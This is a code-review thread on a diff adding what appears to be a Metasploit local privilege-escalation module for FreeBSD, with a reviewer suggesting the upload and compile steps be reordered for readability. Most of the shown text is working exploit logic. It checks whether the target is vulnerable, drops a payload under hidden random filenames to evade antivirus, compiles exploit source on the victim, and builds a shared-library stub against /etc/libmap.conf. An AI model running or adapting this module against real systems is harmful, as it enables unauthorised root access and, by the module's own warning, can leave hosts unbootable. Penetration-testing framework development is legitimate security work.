modules/exploits/freebsd/local/freebsd_fd_ref_count_priv_esc.rb

```diff
@@ -0,0 +1,266 @@
+      vprint_error('File /etc/libmap.conf not found, and is required for exploitation.')
+      return CheckCode::Safe
+    end
+
+    cc = has_cc?
+    if cc
+      vprint_good 'cc is installed'
+    else
+      print_error 'cc is required for compiling'
+      return CheckCode::Safe
+    end
+
+    maxfiles = cmd_exec('sysctl kern.maxfiles').split(' ')[1]
+    if maxfiles.to_i < 64303
+      vprint_error('In testing, when kern.maxfiles is < 60000 the exploit will most likely fail and reboot the system.')
+      return CheckCode::Detected #detected, it is vuln, but not exploitable from our testing, but maybe for others?
+    end
+
+    vprint_good "FreeBSD release #{major} rev r#{rev} with maxfiles #{maxfiles} is vulnerable"
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    # Check if we're already root
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+      end
+    end
+
+    # Make sure we can write our exploit and payload to the remote system
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    libmap = read_file('/etc/libmap.conf')
+    p = store_loot('libmap.conf', 'text/plain', datastore['RHOST'], libmap, 'Backup of libmap.conf')
+    print_status 'Stored /etc/libmap.conf in loot.  If session cleanup is unsuccessful, system will brick. Use this to unbrick'
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    # Upload exploit executable, writing to a random name so AV doesn't have too easy a job
+    executable_name = ".#{rand_text_alphanumeric(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    stub_name = ".#{rand_text_alphanumeric(5..10)}"
+    stub_path = "#{base_dir}/#{stub_name}"
+    vprint_status 'Live compiling exploit on system...'
+    hcw = exploit_data('heavy_cyber_weapon.c').gsub('/tmp/', "#{base_dir}/")
+    hcw = hcw.gsub('#define NUM_THREADS 400', "#define NUM_THREADS #{datastore['Threads']}")
+    hcw = hcw.gsub('#define NUM_FORKS 3', "#define NUM_FORKS #{datastore['Forks']}")
+    upload_and_compile executable_path, strip_comments(hcw), "cc -o #{executable_path} -lpthread #{executable_path}.c"
+    rm_f "#{executable_path}.c"
+    stub = exploit_data('program.c')
+    upload_and_compile stub_path, strip_comments(stub), "cc -o #{stub_path}.o -c #{stub_path}.c -fPIC"
+    cmd_exec "cc -shared -Wl,-soname,libno_ex.so.1 -o #{base_dir}/libno_ex.so.1.0 #{stub_path}.o -nostartfiles"
+    rm_f "#{stub_path}.c"
+    rm_f "#{stub_path}.o"
```

Comment:
This chunk of code could use some line breaks for readability.

Moving the `sub_path` and `stub_name` down to the associated code where the stub is uploaded would help, as they're not used while crafting, uploading, and compiling the exploit in the first half of the chunk.

```ruby
    # Upload exploit executable, writing to a random name so AV doesn't have too easy a job
    vprint_status 'Live compiling exploit on system...'
    executable_name = ".#{rand_text_alphanumeric(5..10)}"
    executable_path = "#{base_dir}/#{executable_name}"
    hcw = exploit_data('heavy_cyber_weapon.c').gsub('/tmp/', "#{base_dir}/")
    hcw = hcw.gsub('#define NUM_THREADS 400', "#define NUM_THREADS #{datastore['Threads']}")
    hcw = hcw.gsub('#define NUM_FORKS 3', "#define NUM_FORKS #{datastore['Forks']}")
    upload_and_compile executable_path, strip_comments(hcw), "cc -o #{executable_path} -lpthread #{executable_path}.c"
    rm_f "#{executable_path}.c"

    # Upload stub
    stub_name = ".#{rand_text_alphanumeric(5..10)}"
    stub_path = "#{base_dir}/#{stub_name}"
    stub = exploit_data('program.c')
    upload_and_compile stub_path, strip_comments(stub), "cc -o #{stub_path}.o -c #{stub_path}.c -fPIC"
    cmd_exec "cc -shared -Wl,-soname,libno_ex.so.1 -o #{base_dir}/libno_ex.so.1.0 #{stub_path}.o -nostartfiles"
    rm_f "#{stub_path}.c"
    rm_f "#{stub_path}.o"
```